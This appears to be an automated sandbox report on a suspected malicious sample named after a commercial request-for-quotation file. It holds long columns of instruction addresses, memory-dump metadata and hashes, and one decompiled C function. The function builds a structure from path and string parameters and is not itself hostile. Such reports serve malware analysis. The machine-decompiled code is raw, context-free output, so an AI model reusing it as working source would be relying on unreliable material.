                                                                                                                                                                                  0x33411821
                                                                                                                                                                                  0x33411824
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411264
                                                                                                                                                                                  0x33411269
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341126f
                                                                                                                                                                                  0x3341126f
                                                                                                                                                                                  0x33411273
                                                                                                                                                                                  0x33411276
                                                                                                                                                                                  0x3341127b
                                                                                                                                                                                  0x33411280
                                                                                                                                                                                  0x33411283
                                                                                                                                                                                  0x33411289
                                                                                                                                                                                  0x3341128f
                                                                                                                                                                                  0x3341128f
                                                                                                                                                                                  0x33411295
                                                                                                                                                                                  0x33411296
                                                                                                                                                                                  0x334112a2
                                                                                                                                                                                  0x334112ac
                                                                                                                                                                                  0x334112b5
                                                                                                                                                                                  0x334112c0
                                                                                                                                                                                  0x334112c3
                                                                                                                                                                                  0x334112d1
                                                                                                                                                                                  0x334112e3
                                                                                                                                                                                  0x334112d3
                                                                                                                                                                                  0x334112dc
                                                                                                                                                                                  0x334112dc
                                                                                                                                                                                  0x334112eb
                                                                                                                                                                                  0x334112f5
                                                                                                                                                                                  0x334112fc
                                                                                                                                                                                  0x33411306
                                                                                                                                                                                  0x33411309
                                                                                                                                                                                  0x33411309
                                                                                                                                                                                  0x334112fc
                                                                                                                                                                                  0x334112eb
                                                                                                                                                                                  0x3341130e
                                                                                                                                                                                  0x3341130e
                                                                                                                                                                                  0x334112a2
                                                                                                                                                                                  0x3341131b
                                                                                                                                                                                  0x33411320
                                                                                                                                                                                  0x33411322
                                                                                                                                                                                  0x33411322
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33411269
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341182a
                                                                                                                                                                                  0x3341182a
                                                                                                                                                                                  0x3341182a
                                                                                                                                                                                  0x3341182c
                                                                                                                                                                                  0x3341182c
                                                                                                                                                                                  0x33411831
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33411837
                                                                                                                                                                                  0x33411837
                                                                                                                                                                                  0x3341183d
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411264
                                                                                                                                                                                  0x33411269
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341126f
                                                                                                                                                                                  0x3341126f
                                                                                                                                                                                  0x33411273
                                                                                                                                                                                  0x33411276
                                                                                                                                                                                  0x3341127b
                                                                                                                                                                                  0x33411280
                                                                                                                                                                                  0x33411283
                                                                                                                                                                                  0x33411289
                                                                                                                                                                                  0x3341128f
                                                                                                                                                                                  0x3341128f
                                                                                                                                                                                  0x33411295
                                                                                                                                                                                  0x33411296
                                                                                                                                                                                  0x334112a2
                                                                                                                                                                                  0x334112ac
                                                                                                                                                                                  0x334112b5
                                                                                                                                                                                  0x334112c0
                                                                                                                                                                                  0x334112c3
                                                                                                                                                                                  0x334112d1
                                                                                                                                                                                  0x334112e3
                                                                                                                                                                                  0x334112d3
                                                                                                                                                                                  0x334112dc
                                                                                                                                                                                  0x334112dc
                                                                                                                                                                                  0x334112eb
                                                                                                                                                                                  0x334112f5
                                                                                                                                                                                  0x334112fc
                                                                                                                                                                                  0x33411306
                                                                                                                                                                                  0x33411309
                                                                                                                                                                                  0x33411309
                                                                                                                                                                                  0x334112fc
                                                                                                                                                                                  0x334112eb
                                                                                                                                                                                  0x3341130e
                                                                                                                                                                                  0x3341130e
                                                                                                                                                                                  0x334112a2
                                                                                                                                                                                  0x3341131b
                                                                                                                                                                                  0x33411320
                                                                                                                                                                                  0x33411322
                                                                                                                                                                                  0x33411322
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33411269
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x3341184a
                                                                                                                                                                                  0x33411850
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33411852
                                                                                                                                                                                  0x33411854
                                                                                                                                                                                  0x33411856
                                                                                                                                                                                  0x33411859
                                                                                                                                                                                  0x33411865
                                                                                                                                                                                  0x33411868
                                                                                                                                                                                  0x3341186a
                                                                                                                                                                                  0x3341186f
                                                                                                                                                                                  0x3341188e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33411897
                                                                                                                                                                                  0x3341189b
                                                                                                                                                                                  0x334118a0
                                                                                                                                                                                  0x3341177d
                                                                                                                                                                                  0x33411782
                                                                                                                                                                                  0x33411783
                                                                                                                                                                                  0x33411785
                                                                                                                                                                                  0x33411789
                                                                                                                                                                                  0x33411789
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33411785
                                                                                                                                                                                  0x334118a6
                                                                                                                                                                                  0x334118a6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334118a6
                                                                                                                                                                                  0x33411878
                                                                                                                                                                                  0x3341187e
                                                                                                                                                                                  0x3341187e
                                                                                                                                                                                  0x33411881
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411264
                                                                                                                                                                                  0x33411269
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341126f
                                                                                                                                                                                  0x3341126f
                                                                                                                                                                                  0x33411273
                                                                                                                                                                                  0x33411276
                                                                                                                                                                                  0x3341127b
                                                                                                                                                                                  0x33411280
                                                                                                                                                                                  0x33411283
                                                                                                                                                                                  0x33411289
                                                                                                                                                                                  0x3341128f
                                                                                                                                                                                  0x3341128f
                                                                                                                                                                                  0x33411295
                                                                                                                                                                                  0x33411296
                                                                                                                                                                                  0x334112a2
                                                                                                                                                                                  0x334112ac
                                                                                                                                                                                  0x334112b5
                                                                                                                                                                                  0x334112c0
                                                                                                                                                                                  0x334112c3
                                                                                                                                                                                  0x334112d1
                                                                                                                                                                                  0x334112e3
                                                                                                                                                                                  0x334112d3
                                                                                                                                                                                  0x334112dc
                                                                                                                                                                                  0x334112dc
                                                                                                                                                                                  0x334112eb
                                                                                                                                                                                  0x334112f5
                                                                                                                                                                                  0x334112fc
                                                                                                                                                                                  0x33411306
                                                                                                                                                                                  0x33411309
                                                                                                                                                                                  0x33411309
                                                                                                                                                                                  0x334112fc
                                                                                                                                                                                  0x334112eb
                                                                                                                                                                                  0x3341130e
                                                                                                                                                                                  0x3341130e
                                                                                                                                                                                  0x334112a2
                                                                                                                                                                                  0x3341131b
                                                                                                                                                                                  0x33411320
                                                                                                                                                                                  0x33411322
                                                                                                                                                                                  0x33411322
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33411269
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334118a9
                                                                                                                                                                                  0x334118a9
                                                                                                                                                                                  0x334118aa
                                                                                                                                                                                  0x334118af
                                                                                                                                                                                  0x334118c1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334118c1
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411264
                                                                                                                                                                                  0x33411269
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341126f
                                                                                                                                                                                  0x3341126f
                                                                                                                                                                                  0x33411273
                                                                                                                                                                                  0x33411276
                                                                                                                                                                                  0x3341127b
                                                                                                                                                                                  0x33411280
                                                                                                                                                                                  0x33411283
                                                                                                                                                                                  0x33411289
                                                                                                                                                                                  0x3341128f
                                                                                                                                                                                  0x3341128f
                                                                                                                                                                                  0x33411295
                                                                                                                                                                                  0x33411296
                                                                                                                                                                                  0x334112a2
                                                                                                                                                                                  0x334112ac
                                                                                                                                                                                  0x334112b5
                                                                                                                                                                                  0x334112c0
                                                                                                                                                                                  0x334112c3
                                                                                                                                                                                  0x334112d1
                                                                                                                                                                                  0x334112e3
                                                                                                                                                                                  0x334112d3
                                                                                                                                                                                  0x334112dc
                                                                                                                                                                                  0x334112dc
                                                                                                                                                                                  0x334112eb
                                                                                                                                                                                  0x334112f5
                                                                                                                                                                                  0x334112fc
                                                                                                                                                                                  0x33411306
                                                                                                                                                                                  0x33411309
                                                                                                                                                                                  0x33411309
                                                                                                                                                                                  0x334112fc
                                                                                                                                                                                  0x334112eb
                                                                                                                                                                                  0x3341130e
                                                                                                                                                                                  0x3341130e
                                                                                                                                                                                  0x334112a2
                                                                                                                                                                                  0x3341131b
                                                                                                                                                                                  0x33411320
                                                                                                                                                                                  0x33411322
                                                                                                                                                                                  0x33411322
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33411269
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x334117f5
                                                                                                                                                                                  0x33411681
                                                                                                                                                                                  0x33411682
                                                                                                                                                                                  0x33411684
                                                                                                                                                                                  0x33411688
                                                                                                                                                                                  0x33411688
                                                                                                                                                                                  0x33411691
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33411691
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411262
                                                                                                                                                                                  0x33411264
                                                                                                                                                                                  0x33411269
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341126f
                                                                                                                                                                                  0x3341126f
                                                                                                                                                                                  0x33411273
                                                                                                                                                                                  0x33411276
                                                                                                                                                                                  0x3341127b
                                                                                                                                                                                  0x33411280
                                                                                                                                                                                  0x33411283
                                                                                                                                                                                  0x33411289
                                                                                                                                                                                  0x3341128f
                                                                                                                                                                                  0x3341128f
                                                                                                                                                                                  0x33411295
                                                                                                                                                                                  0x33411296
                                                                                                                                                                                  0x334112a2
                                                                                                                                                                                  0x334112ac
                                                                                                                                                                                  0x334112b5
                                                                                                                                                                                  0x334112c0
                                                                                                                                                                                  0x334112c3
                                                                                                                                                                                  0x334112d1
                                                                                                                                                                                  0x334112e3
                                                                                                                                                                                  0x334112d3
                                                                                                                                                                                  0x334112dc
                                                                                                                                                                                  0x334112dc
                                                                                                                                                                                  0x334112eb
                                                                                                                                                                                  0x334112f5
                                                                                                                                                                                  0x334112fc
                                                                                                                                                                                  0x33411306
                                                                                                                                                                                  0x33411309
                                                                                                                                                                                  0x33411309
                                                                                                                                                                                  0x334112fc
                                                                                                                                                                                  0x334112eb
                                                                                                                                                                                  0x3341130e
                                                                                                                                                                                  0x3341130e
                                                                                                                                                                                  0x334112a2
                                                                                                                                                                                  0x3341131b
                                                                                                                                                                                  0x33411320
                                                                                                                                                                                  0x33411322
                                                                                                                                                                                  0x33411322
                                                                                                                                                                                  0x33411269
                                                                                                                                                                                  0x33411567
                                                                                                                                                                                  0x3341156a
                                                                                                                                                                                  0x3341156b
                                                                                                                                                                                  0x3341156d
                                                                                                                                                                                  0x33411571
                                                                                                                                                                                  0x33411571
                                                                                                                                                                                  0x3341157a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33411582
                                                                                                                                                                                  0x33411587
                                                                                                                                                                                  0x3341158a
                                                                                                                                                                                  0x3341158f
                                                                                                                                                                                  0x33411440
                                                                                                                                                                                  0x33411442
                                                                                                                                                                                  0x33411442
                                                                                                                                                                                  0x33411444
                                                                                                                                                                                  0x3341144b
                                                                                                                                                                                  0x3341144e
                                                                                                                                                                                  0x33411450
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33411450
                                                                                                                                                                                  0x334114a4
                                                                                                                                                                                  0x334114af
                                                                                                                                                                                  0x334114b2
                                                                                                                                                                                  0x334114b5
                                                                                                                                                                                  0x334114bc
                                                                                                                                                                                  0x334114be
                                                                                                                                                                                  0x334114c3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334114c5
                                                                                                                                                                                  0x334114cb
                                                                                                                                                                                  0x334114cb
                                                                                                                                                                                  0x334114d2
                                                                                                                                                                                  0x3341150e
                                                                                                                                                                                  0x33411516
                                                                                                                                                                                  0x3341151b
                                                                                                                                                                                  0x3341151b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341150e
                                                                                                                                                                                  0x334114d6
                                                                                                                                                                                  0x334114d7
                                                                                                                                                                                  0x334114d9
                                                                                                                                                                                  0x334114dd
                                                                                                                                                                                  0x334114dd
                                                                                                                                                                                  0x334114e3
                                                                                                                                                                                  0x334114e9
                                                                                                                                                                                  0x334114ec
                                                                                                                                                                                  0x334114f5
                                                                                                                                                                                  0x334114f8
                                                                                                                                                                                  0x334114fd
                                                                                                                                                                                  0x334114fd
                                                                                                                                                                                  0x334114ec
                                                                                                                                                                                  0x33411521
                                                                                                                                                                                  0x33411527
                                                                                                                                                                                  0x33411549
                                                                                                                                                                                  0x33411559
                                                                                                                                                                                  0x33411559
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33411549
                                                                                                                                                                                  0x33411529
                                                                                                                                                                                  0x3341152e
                                                                                                                                                                                  0x33411537
                                                                                                                                                                                  0x3341153a
                                                                                                                                                                                  0x3341153f
                                                                                                                                                                                  0x3341153f
                                                                                                                                                                                  0x3341152e
                                                                                                                                                                                  0x33411442
                                                                                                                                                                                  0x33411440
                                                                                                                                                                                  0x3341178f
                                                                                                                                                                                  0x33411792
                                                                                                                                                                                  0x33411792
                                                                                                                                                                                  0x33411792
                                                                                                                                                                                  0x3341179d
                                                                                                                                                                                  0x3341179f
                                                                                                                                                                                  0x334117a2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334117a2

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 89a3ac1263c773d4ef02dd85e145ed59f5e85595e7709a5aad1f1de61cf8b40e
                                                                                                                                                                                  • Instruction ID: 3ea7d304cece05a7062445f8538098763808b8d9def2f3abbd9137d4b93f1dde
                                                                                                                                                                                  • Opcode Fuzzy Hash: 89a3ac1263c773d4ef02dd85e145ed59f5e85595e7709a5aad1f1de61cf8b40e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B22A075F00A168FDB09CF58C480AAEB3B6BF89344F18816DD855EB385DB34E952CB94
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33348347 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                                  			E33348347(intOrPtr* __ecx, signed short* __edx, signed short* _a4, signed short* _a8, signed short* _a12, intOrPtr _a16, signed short* _a20, signed short* _a24, signed short* _a28, intOrPtr* _a32, signed short* _a36, signed char _a40) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed short* _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _t125;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				void* _t133;
				intOrPtr* _t134;
				intOrPtr _t156;
				void* _t162;
				intOrPtr _t199;
				signed short* _t210;
				signed int _t212;
				void* _t214;
				signed short* _t219;
				void* _t231;
				signed int _t242;
				intOrPtr* _t259;
				signed short* _t266;
				short _t272;
				signed int _t275;
				void* _t276;
				signed short* _t277;
				intOrPtr _t282;
				intOrPtr* _t283;
				signed short* _t284;
				signed short* _t285;
				intOrPtr* _t286;

				_v24 = __edx;
				_v36 = __ecx;
				if((_a40 & 0xfffffffe) != 0) {
					L82:
					return 0xc000000d;
				}
				_v20 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				if(E333487BF(__edx) < 0) {
					goto L82;
				}
				_t285 = _a4;
				if(_t285 != 0) {
					_t125 = E333487BF(_t285);
				} else {
					_t125 = 0;
				}
				if(_t125 < 0) {
					goto L82;
				} else {
					_t219 = _a8;
					_v5 = 0;
					_v32 = 0;
					_t276 = 0x5c;
					if(_t219 == 0) {
						L11:
						_t277 = _a12;
						if(_t277 == 0) {
							_t126 = 0;
						} else {
							_t126 = E333487BF(_t277);
						}
						if(_t126 < 0) {
							goto L82;
						} else {
							_t127 = _a20;
							if(_a20 == 0) {
								_t128 = 0;
							} else {
								_t128 = E333487BF(_t127);
							}
							if(_t128 < 0) {
								goto L82;
							} else {
								_t220 = _a24;
								if(_a24 == 0) {
									_t129 = 0;
								} else {
									_t129 = E333487BF(_t220);
								}
								if(_t129 < 0) {
									goto L82;
								} else {
									_t130 = _a28;
									if(_a28 != 0) {
										_t131 = E333487BF(_t130);
									} else {
										_t131 = 0;
									}
									if(_t131 < 0) {
										goto L82;
									} else {
										_t259 = _a32;
										if(_t259 != 0) {
											_t132 = E333487BF(_t259);
										} else {
											_t132 = 0;
										}
										if(_t132 < 0) {
											goto L82;
										} else {
											_t210 = _a36;
											if(_t210 != 0) {
												_t133 = E333487BF(_t210);
											} else {
												_t133 = 0;
											}
											if(_t133 < 0) {
												goto L82;
											} else {
												if(_t277 == 0) {
													_t277 = _v24;
													_a12 = _t277;
												}
												if(_a20 == 0) {
													_a20 = 0x33321010;
												}
												_t134 = _a24;
												if(_t134 == 0) {
													_t134 = 0x33321010;
													_a24 = 0x33321010;
												}
												if(_a28 == 0) {
													_a28 = 0x33321010;
												}
												if(_t259 == 0) {
													_t259 = 0x33321010;
													_a32 = 0x33321010;
												}
												_t282 = (( *(_a20 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc) + 0x4c8 + (( *(_t134 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc) + (( *_v24 & 0x0000ffff) + 0x00000005 & 0xfffffffc) + (( *(_a28 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc) + (( *_t277 & 0x0000ffff) + 0x00000005 & 0xfffffffc);
												_t231 = 0;
												if( *_t259 != 0) {
													_t282 = _t282 + (( *(_t259 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc);
												}
												if(_t285 != 0) {
													_t282 = _t282 + (( *(_t285 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc);
												}
												if(_t210 != 0) {
													_t282 = _t282 + (( *(_t210 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc);
												}
												if(_a16 != _t231) {
													_t156 = E3337BA17(_a16, 1);
													_t231 = 0;
												} else {
													_t156 =  *((intOrPtr*)(_v20 + 0x290));
												}
												_v16 = _t156;
												_t212 = _t156 + 0x00000003 & 0xfffffffc;
												if(_t212 < _t156) {
													L77:
													return 0xc0000095;
												} else {
													while(1) {
														_t158 = _t212 + _t282;
														if(_t212 + _t282 < _t282) {
															goto L77;
														}
														_t286 = L33365D90(_t231,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t231, _t158);
														if(_t286 == 0) {
															return 0xc000009a;
														}
														_t162 = _t282 + _t286;
														if(_a16 != 0) {
															E333988C0(_t162, _a16, _v16);
															L47:
															E33398F40(_t286, 0, 0x2c0);
															 *(_t286 + 0x290) = _t212;
															_t213 = _v20;
															 *((intOrPtr*)(_t286 + 0x48)) = _t282 + _t286;
															_t56 = _t286 + 0x2c0; // 0x2c0
															 *_t286 = _t282;
															_v12 = _t56;
															 *((intOrPtr*)(_t286 + 4)) = _t282;
															_t59 = _t286 + 0x24; // 0x24
															_t283 = _t59;
															 *((intOrPtr*)(_t286 + 8)) = 1;
															 *(_t286 + 0x14) =  *(_v20 + 0x14) & 1;
															_t170 = _a8;
															if(_a8 == 0) {
																E3335FED0(0x33445b40);
																E33348746( &_v12, _t283, _t213 + 0x24, 0x208);
																_push(0x33445b40);
																E3335E740( &_v12);
																L63:
																_t214 = 2;
																L50:
																_t236 = _a4;
																if(_a4 != 0) {
																	_t104 = _t286 + 0x30; // 0x30
																	E33348746( &_v12, _t104, _t236,  *(_t236 + 2) & 0x0000ffff);
																}
																_t238 = _a36;
																if(_a36 != 0) {
																	_t116 = _t286 + 0x2a4; // 0x2a4
																	E33348746( &_v12, _t116, _t238,  *(_t238 + 2) & 0x0000ffff);
																}
																_t73 = _t286 + 0x38; // 0x38
																E33348746( &_v12, _t73, _v24, ( *_v24 & 0x0000ffff) + _t214);
																_t284 = _a12;
																_t76 = _t286 + 0x40; // 0x40
																_t266 = _t76;
																_t242 =  *_t284 & 0x0000ffff;
																_t182 = _t284[1] & 0x0000ffff;
																if(_t242 != (_t284[1] & 0x0000ffff)) {
																	_t182 = _t214 + _t242;
																}
																E33348746( &_v12, _t266, _t284, _t182);
																_t81 = _t286 + 0x70; // 0x70
																E33348746( &_v12, _t81, _a20,  *(_a20 + 2) & 0x0000ffff);
																_t85 = _t286 + 0x78; // 0x78
																E33348746( &_v12, _t85, _a24,  *(_a24 + 2) & 0x0000ffff);
																_t89 = _t286 + 0x80; // 0x80
																E33348746( &_v12, _t89, _a28,  *(_a28 + 2) & 0x0000ffff);
																_t250 = _a32;
																if( *_a32 != 0) {
																	_t119 = _t286 + 0x88; // 0x88
																	E33348746( &_v12, _t119, _t250,  *(_t250 + 2) & 0x0000ffff);
																}
																if((_a40 & 0x00000001) == 0) {
																	_t286 = E333D5AE0(_t286);
																}
																 *_v36 = _t286;
																return 0;
															}
															E33348746( &_v12, _t283, _t170, 0x208);
															if(_v5 == 0) {
																goto L63;
															}
															_t272 = 0x5c;
															_t214 = 2;
															 *((short*)( *((intOrPtr*)(_t286 + 0x28)) + _v32 * 2)) = _t272;
															 *_t283 =  *_t283 + _t214;
															goto L50;
														}
														E3335FED0(0x33445b40);
														_t273 = _v20;
														_t199 =  *((intOrPtr*)(_v20 + 0x290));
														_v16 = _t199;
														_t255 = _t199 + 0x00000003 & 0xfffffffc;
														_v28 = _t199 + 0x00000003 & 0xfffffffc;
														if(_t199 > _t212) {
															_push(0x33445b40);
															E3335E740(_t255);
															E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t286);
															_t212 = _v28;
															_t231 = 0;
															if(_t212 >= _v16) {
																continue;
															}
															goto L77;
														}
														E333988C0(_t282 + _t286,  *((intOrPtr*)(_t273 + 0x48)), _t199);
														_push(0x33445b40);
														E3335E740(_t255);
														_t212 = _v28;
														goto L47;
													}
													goto L77;
												}
											}
										}
									}
								}
							}
						}
					}
					_t275 = ( *_t219 & 0x0000ffff) >> 1;
					_v32 = _t275;
					if(E333487BF(_t219) < 0 || _t275 == 0) {
						goto L82;
					} else {
						if( *((intOrPtr*)(_t219[2] + _t275 * 2 - 2)) == _t276) {
							goto L11;
						}
						if(_t275 > 0x103) {
							goto L82;
						}
						_v5 = 1;
						goto L11;
					}
				}
			}







































                                                                                                                                                                                  0x33348359
                                                                                                                                                                                  0x3334835c
                                                                                                                                                                                  0x3334835f
                                                                                                                                                                                  0x333ab435
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ab435
                                                                                                                                                                                  0x33348370
                                                                                                                                                                                  0x3334837a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33348380
                                                                                                                                                                                  0x33348387
                                                                                                                                                                                  0x333486c0
                                                                                                                                                                                  0x3334838d
                                                                                                                                                                                  0x3334838d
                                                                                                                                                                                  0x3334838d
                                                                                                                                                                                  0x33348391
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33348397
                                                                                                                                                                                  0x33348397
                                                                                                                                                                                  0x3334839a
                                                                                                                                                                                  0x3334839d
                                                                                                                                                                                  0x333483a2
                                                                                                                                                                                  0x333483a5
                                                                                                                                                                                  0x333483de
                                                                                                                                                                                  0x333483de
                                                                                                                                                                                  0x333483e3
                                                                                                                                                                                  0x333ab33f
                                                                                                                                                                                  0x333483e9
                                                                                                                                                                                  0x333483eb
                                                                                                                                                                                  0x333483eb
                                                                                                                                                                                  0x333483f2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333483f8
                                                                                                                                                                                  0x333483f8
                                                                                                                                                                                  0x333483fd
                                                                                                                                                                                  0x333ab346
                                                                                                                                                                                  0x33348403
                                                                                                                                                                                  0x33348405
                                                                                                                                                                                  0x33348405
                                                                                                                                                                                  0x3334840c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33348412
                                                                                                                                                                                  0x33348412
                                                                                                                                                                                  0x33348417
                                                                                                                                                                                  0x333ab34d
                                                                                                                                                                                  0x3334841d
                                                                                                                                                                                  0x3334841d
                                                                                                                                                                                  0x3334841d
                                                                                                                                                                                  0x33348424
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334842a
                                                                                                                                                                                  0x3334842a
                                                                                                                                                                                  0x3334842f
                                                                                                                                                                                  0x333ab356
                                                                                                                                                                                  0x33348435
                                                                                                                                                                                  0x33348435
                                                                                                                                                                                  0x33348435
                                                                                                                                                                                  0x33348439
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334843f
                                                                                                                                                                                  0x3334843f
                                                                                                                                                                                  0x33348444
                                                                                                                                                                                  0x333ab362
                                                                                                                                                                                  0x3334844a
                                                                                                                                                                                  0x3334844a
                                                                                                                                                                                  0x3334844a
                                                                                                                                                                                  0x3334844e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33348454
                                                                                                                                                                                  0x33348454
                                                                                                                                                                                  0x33348459
                                                                                                                                                                                  0x333ab36e
                                                                                                                                                                                  0x3334845f
                                                                                                                                                                                  0x3334845f
                                                                                                                                                                                  0x3334845f
                                                                                                                                                                                  0x33348463
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33348469
                                                                                                                                                                                  0x3334846b
                                                                                                                                                                                  0x333ab378
                                                                                                                                                                                  0x333ab37b
                                                                                                                                                                                  0x333ab37b
                                                                                                                                                                                  0x3334847a
                                                                                                                                                                                  0x333ab383
                                                                                                                                                                                  0x333ab383
                                                                                                                                                                                  0x33348480
                                                                                                                                                                                  0x33348485
                                                                                                                                                                                  0x333ab38b
                                                                                                                                                                                  0x333ab38d
                                                                                                                                                                                  0x333ab38d
                                                                                                                                                                                  0x3334848f
                                                                                                                                                                                  0x33348491
                                                                                                                                                                                  0x33348491
                                                                                                                                                                                  0x33348496
                                                                                                                                                                                  0x33348498
                                                                                                                                                                                  0x3334849a
                                                                                                                                                                                  0x3334849a
                                                                                                                                                                                  0x333484e2
                                                                                                                                                                                  0x333484e4
                                                                                                                                                                                  0x333484e9
                                                                                                                                                                                  0x333ab39f
                                                                                                                                                                                  0x333ab39f
                                                                                                                                                                                  0x333484f1
                                                                                                                                                                                  0x333486d4
                                                                                                                                                                                  0x333486d4
                                                                                                                                                                                  0x333484f9
                                                                                                                                                                                  0x333ab3b0
                                                                                                                                                                                  0x333ab3b0
                                                                                                                                                                                  0x33348502
                                                                                                                                                                                  0x333486e1
                                                                                                                                                                                  0x333486e6
                                                                                                                                                                                  0x33348508
                                                                                                                                                                                  0x3334850b
                                                                                                                                                                                  0x3334850b
                                                                                                                                                                                  0x33348514
                                                                                                                                                                                  0x33348517
                                                                                                                                                                                  0x3334851c
                                                                                                                                                                                  0x333ab3e2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33348522
                                                                                                                                                                                  0x33348522
                                                                                                                                                                                  0x33348522
                                                                                                                                                                                  0x33348527
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334853d
                                                                                                                                                                                  0x33348541
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ab42b
                                                                                                                                                                                  0x3334854b
                                                                                                                                                                                  0x3334854e
                                                                                                                                                                                  0x333486f4
                                                                                                                                                                                  0x33348598
                                                                                                                                                                                  0x333485a1
                                                                                                                                                                                  0x333485a9
                                                                                                                                                                                  0x333485af
                                                                                                                                                                                  0x333485b4
                                                                                                                                                                                  0x333485b8
                                                                                                                                                                                  0x333485be
                                                                                                                                                                                  0x333485c0
                                                                                                                                                                                  0x333485c6
                                                                                                                                                                                  0x333485c9
                                                                                                                                                                                  0x333485c9
                                                                                                                                                                                  0x333485cc
                                                                                                                                                                                  0x333485d4
                                                                                                                                                                                  0x333485d7
                                                                                                                                                                                  0x333485dc
                                                                                                                                                                                  0x33348706
                                                                                                                                                                                  0x33348719
                                                                                                                                                                                  0x3334871e
                                                                                                                                                                                  0x33348723
                                                                                                                                                                                  0x33348728
                                                                                                                                                                                  0x3334872a
                                                                                                                                                                                  0x3334860f
                                                                                                                                                                                  0x3334860f
                                                                                                                                                                                  0x33348614
                                                                                                                                                                                  0x33348734
                                                                                                                                                                                  0x3334873c
                                                                                                                                                                                  0x3334873c
                                                                                                                                                                                  0x3334861a
                                                                                                                                                                                  0x3334861f
                                                                                                                                                                                  0x333ab3f0
                                                                                                                                                                                  0x333ab3fb
                                                                                                                                                                                  0x333ab3fb
                                                                                                                                                                                  0x33348628
                                                                                                                                                                                  0x33348635
                                                                                                                                                                                  0x3334863a
                                                                                                                                                                                  0x3334863d
                                                                                                                                                                                  0x3334863d
                                                                                                                                                                                  0x33348640
                                                                                                                                                                                  0x33348643
